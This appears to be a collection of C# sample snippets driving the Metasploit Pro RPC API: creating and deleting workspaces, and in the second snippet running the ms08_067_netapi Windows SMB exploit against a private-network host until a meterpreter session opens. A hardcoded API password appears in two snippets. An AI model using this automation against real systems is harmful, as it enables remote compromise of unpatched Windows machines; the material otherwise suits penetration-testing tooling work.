public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
string workspace = Guid.NewGuid().ToString();
Dictionary<object, object> options = new Dictionary<object, object>();
options.Add("name", workspace);
Dictionary<object, object> response = manager.AddProProject(options);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
response = manager.DeleteProWorkspace(workspace);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
response = manager.CreateConsole();
workspace = Guid.NewGuid().ToString();
string consoleID = response["id"] as string;
response = manager.WriteToConsole(consoleID, "workspace -a " + workspace + "\n");
response = manager.WriteToConsole(consoleID, "workspace\n");
response = manager.WriteToConsole(consoleID, "workspace -d " + workspace + "\n");
response = manager.ReadConsole(consoleID);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
manager.DestroyConsole(consoleID);
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
if (string.IsNullOrEmpty(session.Token))
throw new Exception("Login failed. Check credentials");
using (MetasploitProManager manager = new MetasploitProManager(session))
{
// Dictionary<object, object> options = new Dictionary<object, object>();
// options.Add("RHOST", "192.168.1.129");
// options.Add("RPORT", "445");
// options.Add("LPORT", new Random().Next(1001, 50000));
//
// Dictionary<object, object> response = manager.ExecuteModule("exploit", "windows/smb/ms08_067_netapi", options);
//
// foreach (KeyValuePair<object, object> pair in response)
// Console.WriteLine(pair.Key + ": " + pair.Value);
var response = manager.CreateConsole();
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
string consoleID = response["id"] as string;
Console.WriteLine("Setting up options...");
response = manager.WriteToConsole(consoleID, "use exploit/windows/smb/ms08_067_netapi\n");
System.Threading.Thread.Sleep(6000);
response = manager.WriteToConsole(consoleID, "set RHOST 192.168.1.129\n");
System.Threading.Thread.Sleep(6000);
response = manager.WriteToConsole(consoleID, "set LPORT " + new Random().Next(1001, 50000) + "\n");
System.Threading.Thread.Sleep(6000);
Console.WriteLine("Exploiting...");
response = manager.WriteToConsole(consoleID, "exploit\n");
System.Threading.Thread.Sleep(12000);
bool busy = true;
while (busy)
{
response = manager.ReadConsole(consoleID);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
busy = bool.Parse(response["busy"].ToString());
if ((response["prompt"] as string).Contains("meterpreter"))
break;
}
response = manager.ListSessions();
foreach (var pair in response)
foreach (var p in pair.Value as Dictionary<object, object>)
Console.WriteLine(p.Key + ": " + p.Value);
manager.DestroyConsole(consoleID);
}
}
}
private void CreateNewMetasploitWorkspace(string workspace)
{
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
// Dictionary<object, object> options = new Dictionary<object, object>();
// options.Add("name", workspace);
//
// manager.AddProWorkspace(options);
Dictionary<string, object> response = manager.CreateConsole ();
string consoleID = response ["id"] as string;
manager.WriteToConsole (consoleID, "workspace -a \"" + workspace + "\"\n");
Thread.Sleep (new TimeSpan (0, 0, 30));
manager.WriteToConsole (consoleID, "workspace \n");
manager.DestroyConsole (consoleID);
}
}
}
